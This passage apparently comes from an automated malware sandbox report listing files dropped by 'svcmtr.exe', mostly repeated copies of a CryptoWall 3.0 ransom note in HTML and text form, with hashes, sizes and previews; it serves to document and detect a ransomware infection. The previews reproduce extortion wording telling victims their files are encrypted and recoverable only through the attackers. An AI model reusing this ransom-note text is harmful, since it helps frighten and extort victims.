                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):430
                                                                                                                          Entropy (8bit):5.913381561430947
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2TkIdn:c+z5U4a8OoDUX+S2TkIdn
                                                                                                                          MD5:9559B4B0A7E9B54F1E77FDDFF1BA4D3C
                                                                                                                          SHA1:AD0C9C5A7AFB954840386E2600C61087CA1FE854
                                                                                                                          SHA-256:FFC25C9C9000BBC75F3E0551D09FC70DFBE7C10D6EA6832420CD10C8A5D4C198
                                                                                                                          SHA-512:3D18EF1764A5FDD452222ED35DA3830FA9ED2C869AF3AA0193EE39A2B9AA44723F71FC66E69A4961433C6EBC02C5FCCE4A8CAB3A5A4F1EC6130AEB07814254E7
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..#..[R@JLA.....*4....n.......oF}..?.

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl\0.57.44.2492\_metadata\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl\0.57.44.2492\_metadata\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl\0.57.44.2492\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl\0.57.44.2492\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft Help\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft Help\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\FORMS\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\FORMS\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Feeds\Feeds for United States~\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
